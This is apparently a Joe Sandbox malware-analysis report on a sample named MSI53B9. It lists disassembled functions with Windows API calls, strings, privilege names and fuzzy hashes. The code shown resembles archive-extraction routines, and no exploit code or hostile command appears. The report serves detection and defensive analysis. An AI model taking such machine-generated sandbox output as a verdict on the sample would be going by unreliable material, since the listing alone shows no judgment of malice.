Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5bce15c15dd23fabbd9d2a3fc6a15f624b0be259d2b6a96d797affcc50beef8b
Instruction ID: f9dc595a1caaf7252dce3fd6dec8321e4d57c9cb096f983195a2632ebd2e3687
Opcode Fuzzy Hash: 5bce15c15dd23fabbd9d2a3fc6a15f624b0be259d2b6a96d797affcc50beef8b
Instruction Fuzzy Hash: 29B012D129C006AD318CF14C5D02D37010DF0C2B24330C41FF401C1B48E9D90C5E8233

Function 0088C726 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0088C738

Part of subcall function 0088CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088CB39
Part of subcall function 0088CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088CB4A

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0a2d1fd84a1f7c6765b76e5d937451de3970e1aaa5307120e44c5e6bff3d2d3e
Instruction ID: 9ebd377f6b82cbf5f18bd63e572e9cc9fe22f0e905d3458b1982c86dbecc80ce
Opcode Fuzzy Hash: 0a2d1fd84a1f7c6765b76e5d937451de3970e1aaa5307120e44c5e6bff3d2d3e
Instruction Fuzzy Hash: 39B012E1268226BC350CB1D82D42D37050CF0C2B24330851FF400D4944EAA42C44CB33

Function 0088C74B Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0088C738

Part of subcall function 0088CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088CB39
Part of subcall function 0088CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088CB4A

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a540938f360854be2c62944c25788a4b2d3ba259e141603d0c97d9987bb3a06c
Instruction ID: d622cf05cd0750b5afc94d09e92fa449aca0597803bfa2c784cacfba6941f40d
Opcode Fuzzy Hash: a540938f360854be2c62944c25788a4b2d3ba259e141603d0c97d9987bb3a06c
Instruction Fuzzy Hash: A3B012D1278116AC324CF19C2D02D37054CF0C2B14330C41FF800C0A44E9941C048B33

Function 0088C741 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0088C738

Part of subcall function 0088CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088CB39
Part of subcall function 0088CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088CB4A

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9933d15a70a45e73c601d8b437d6e280403ff547e60a0124d387388a912149af
Instruction ID: 398f5a82b641eb81ba9446629a464d0be023ac120429689315cfe4c83eea8e72
Opcode Fuzzy Hash: 9933d15a70a45e73c601d8b437d6e280403ff547e60a0124d387388a912149af
Instruction Fuzzy Hash: 39B012D1378016AC318CF19CAD02E37054CF0C2B14330851FF401C0A44E9941C048733

Function 0088C75F Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0088C738

Part of subcall function 0088CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088CB39
Part of subcall function 0088CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088CB4A

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7e7e3cf28bdba3bd67bc93f233d84f8591db2823773fe9cbfbdf75a4497bfc06
Instruction ID: 661b00c467403a5c9d429b8a6fb0d98bf4afd69e4afe6819a472290e860935fd
Opcode Fuzzy Hash: 7e7e3cf28bdba3bd67bc93f233d84f8591db2823773fe9cbfbdf75a4497bfc06
Instruction Fuzzy Hash: CDB012D1268216AD314CF19C7F02D37054CF0C2B14330841FF400C0A44F9981C058B33

Function 0088C782 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0088C738

Part of subcall function 0088CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088CB39
Part of subcall function 0088CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088CB4A

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 647b27e0694985c668f9435ef45d5e45e9e4005c05e526f217d8d8697d370c17
Instruction ID: 436b7988e164a7ec813bcd55de263cc2a5b515a7e2646b94d6b765e64bec88bc
Opcode Fuzzy Hash: 647b27e0694985c668f9435ef45d5e45e9e4005c05e526f217d8d8697d370c17
Instruction Fuzzy Hash: 10A011E22A800BBC3008B2A82C02C3B0A0CF0C2B28330880EF802C0288A8A808000A32

Function 0088C7A7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0088C799

Part of subcall function 0088CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088CB39
Part of subcall function 0088CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088CB4A

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2e4afd72fc82be199d24eeb7757ecefb9c7c3cd13b63fcd150a9a2db747c9fc0
Instruction ID: 50cec48405f5031c267507c4f1bec9fcfedb8f97deed5a77d7ae40740af1a4fb
Opcode Fuzzy Hash: 2e4afd72fc82be199d24eeb7757ecefb9c7c3cd13b63fcd150a9a2db747c9fc0
Instruction Fuzzy Hash: 86A011E22A800ABC3088B2082C02C3B020CF0C2B28330880EF802C0288A8E80CA88232

Function 0088C7B1 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0088C799

Part of subcall function 0088CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088CB39
Part of subcall function 0088CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088CB4A

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 90a426a2e18198e816775c6c5c51d97917f9256b174ba54c09290d10bf454bc0
Instruction ID: 50cec48405f5031c267507c4f1bec9fcfedb8f97deed5a77d7ae40740af1a4fb
Opcode Fuzzy Hash: 90a426a2e18198e816775c6c5c51d97917f9256b174ba54c09290d10bf454bc0
Instruction Fuzzy Hash: 86A011E22A800ABC3088B2082C02C3B020CF0C2B28330880EF802C0288A8E80CA88232

Function 0088C75A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0088C738

Part of subcall function 0088CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088CB39
Part of subcall function 0088CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088CB4A

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 96ed7d873b7cc10e3199be2bc1ef905cd4b25e83bccae8dcc1408f956f984024
Instruction ID: 436b7988e164a7ec813bcd55de263cc2a5b515a7e2646b94d6b765e64bec88bc
Opcode Fuzzy Hash: 96ed7d873b7cc10e3199be2bc1ef905cd4b25e83bccae8dcc1408f956f984024
Instruction Fuzzy Hash: 10A011E22A800BBC3008B2A82C02C3B0A0CF0C2B28330880EF802C0288A8A808000A32

Function 0088C76E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0088C738

Part of subcall function 0088CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088CB39
Part of subcall function 0088CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088CB4A

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 63d3cc6739577bfd1c8e70ddb7535700860eaf3187c3ce65de90d68282d7d40f
Instruction ID: 436b7988e164a7ec813bcd55de263cc2a5b515a7e2646b94d6b765e64bec88bc
Opcode Fuzzy Hash: 63d3cc6739577bfd1c8e70ddb7535700860eaf3187c3ce65de90d68282d7d40f
Instruction Fuzzy Hash: 10A011E22A800BBC3008B2A82C02C3B0A0CF0C2B28330880EF802C0288A8A808000A32

Function 0088C778 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0088C738

Part of subcall function 0088CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088CB39
Part of subcall function 0088CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088CB4A

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b58edcd091dea218955ae15810bbff83073f8b4b51151952a20fa6d4b6e3417f
Instruction ID: 436b7988e164a7ec813bcd55de263cc2a5b515a7e2646b94d6b765e64bec88bc
Opcode Fuzzy Hash: b58edcd091dea218955ae15810bbff83073f8b4b51151952a20fa6d4b6e3417f
Instruction Fuzzy Hash: 10A011E22A800BBC3008B2A82C02C3B0A0CF0C2B28330880EF802C0288A8A808000A32

Function 00879B6A Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE(?,00878EDB,?,?,-00001954), ref: 00879B6D

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: 52df872926cc86d9ce85bf40e6ad937cee1a83ea9970f6692316d7b1f36f7e4a
Instruction ID: f521cf5c77402baa3b6b8c9770714fda0e584112cbf776dce5c2994af4d47d67
Opcode Fuzzy Hash: 52df872926cc86d9ce85bf40e6ad937cee1a83ea9970f6692316d7b1f36f7e4a
Instruction Fuzzy Hash: A5B011300E080A8A8E002B30CC088203A20EA2230A30082A0A00AC80A0CB23C002AA00

Non-executed Functions

Function 0088A537 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 289timewindowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 008712E7: GetDlgItem.USER32(00000000,00003021), ref: 0087132B
Part of subcall function 008712E7: SetWindowTextW.USER32(00000000,008A02E4), ref: 00871341

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0088A5C8
EndDialog.USER32(?,00000006), ref: 0088A5DB
GetDlgItem.USER32(?,0000006C), ref: 0088A5F7
SetFocus.USER32(00000000), ref: 0088A5FE
SetDlgItemTextW.USER32(?,00000065,?), ref: 0088A63E
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0088A671
FindFirstFileW.KERNEL32(?,?), ref: 0088A687
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0088A6A5
FileTimeToSystemTime.KERNEL32(?,?), ref: 0088A6B5
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0088A6D2
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0088A6F0

Part of subcall function 0087D142: LoadStringW.USER32(?,?,00000200,?), ref: 0087D187
Part of subcall function 0087D142: LoadStringW.USER32(?,?,00000200,?), ref: 0087D19D

_swprintf.LIBCMT ref: 0088A720

Part of subcall function 00873F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00873F6E

SetDlgItemTextW.USER32(?,0000006A,?), ref: 0088A733
FindClose.KERNEL32(00000000), ref: 0088A736
_swprintf.LIBCMT ref: 0088A791
SetDlgItemTextW.USER32(?,00000068,?), ref: 0088A7A4
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0088A7BA
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0088A7DA
FileTimeToSystemTime.KERNEL32(?,?), ref: 0088A7EA
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0088A804
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0088A81C
_swprintf.LIBCMT ref: 0088A84D
SetDlgItemTextW.USER32(?,0000006B,?), ref: 0088A860
_swprintf.LIBCMT ref: 0088A8B0
SetDlgItemTextW.USER32(?,00000069,?), ref: 0088A8C3

Part of subcall function 0088932F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00889355
Part of subcall function 0088932F: GetNumberFormatW.KERNEL32(00000400,00000000,?,008AA154,?,?), ref: 008893A4

Strings

REPLACEFILEDLG, xrefs: 0088A55E
%s %s, xrefs: 0088A77F, 0088A8A2
%s %s %s, xrefs: 0088A70E, 0088A83A

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLoadLocalStringSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$REPLACEFILEDLG
API String ID: 3227067027-1840816070
Opcode ID: 34c4c64ec3783ff7d9757ab25dc479b7946760a571ff41a8624453ccb593369a
Instruction ID: 4fbee63d22c6f6c453deb900bb87961b7278c7fd3fe11d65f1ad4e3fa5e38800
Opcode Fuzzy Hash: 34c4c64ec3783ff7d9757ab25dc479b7946760a571ff41a8624453ccb593369a
Instruction Fuzzy Hash: A8919172648308BBE621EBA4CC49FFB77ACFB4A704F044819F649D2581D775AA058B63

Function 00877070 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00877075
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 008771D5
CloseHandle.KERNEL32(00000000), ref: 008771E5

Part of subcall function 00877A9D: GetCurrentProcess.KERNEL32(00000020,?), ref: 00877AAC
Part of subcall function 00877A9D: GetLastError.KERNEL32 ref: 00877AF2
Part of subcall function 00877A9D: CloseHandle.KERNEL32(?), ref: 00877B01

CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 008771F0
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 008772FE
DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 0087732A
CloseHandle.KERNEL32(?), ref: 0087733C
GetLastError.KERNEL32(00000015,00000000,?), ref: 0087734C
RemoveDirectoryW.KERNEL32(?), ref: 00877398
DeleteFileW.KERNEL32(?), ref: 008773C0

Strings

SeCreateSymbolicLinkPrivilege, xrefs: 008770A0
UNC\, xrefs: 00877120
SeRestorePrivilege, xrefs: 00877096
\??\, xrefs: 008770FB

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3935142422-3508440684
Opcode ID: 5d64751835bee5886166e1bdc9bd5f47128ea700792c48a3db68028d9a116859
Instruction ID: fa2ebe81dd2047baa2ab24ccaefbbacc3483fb3e552427a0478baecc214c1801
Opcode Fuzzy Hash: 5d64751835bee5886166e1bdc9bd5f47128ea700792c48a3db68028d9a116859
Instruction Fuzzy Hash: 53B1BF719042189BEF20EF68CC45BEE77A8FF09304F548569F919E7246D730EA45CB62

Function 00873203 Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 604COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0087320C
_memcmp.LIBVCRUNTIME ref: 008732EF

Strings

CMT, xrefs: 00873904
h%u, xrefs: 008735A1
hc%u, xrefs: 008735EF

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: H_prolog_memcmp
String ID: CMT$h%u$hc%u
API String ID: 3004599000-3282847064
Opcode ID: 92cce9c2fb72f8375ecfef96413aece4edcd31d51e4d936cc0a7828dde588900
Instruction ID: 5ec32abf3472af3ced660e34b7bc1e881620433819e44102e569d94feecc1f8d
Opcode Fuzzy Hash: 92cce9c2fb72f8375ecfef96413aece4edcd31d51e4d936cc0a7828dde588900
Instruction Fuzzy Hash: 423281715142849BDB14DF68C886AE93BA5FF15304F04847DFD8ECB28ADB70DA48CB62

Function 0089A35E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0089A4A4

Strings

1#INF, xrefs: 0089B6B1
1#QNAN, xrefs: 0089B6AA
1#IND, xrefs: 0089B69C
1#SNAN, xrefs: 0089B6A3

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: e77b6474d84e81d2e360a96e0b78e537baa1e2143d84556bdcea54de6ebfdc88
Instruction ID: 387ff932066e0697a6c324e9abb84b4f1d1ac066bf2d47edd8dc298121bf27d1
Opcode Fuzzy Hash: e77b6474d84e81d2e360a96e0b78e537baa1e2143d84556bdcea54de6ebfdc88
Instruction Fuzzy Hash: D6C21871E046288FDF29EE68DD407A9B7B5FB84305F1941AAD44EE7240E774AE818F81

Function 0087276C Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 793COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00872775
_strlen.LIBCMT ref: 00872CFF
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00872E56

Strings

CMT, xrefs: 00872E89

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
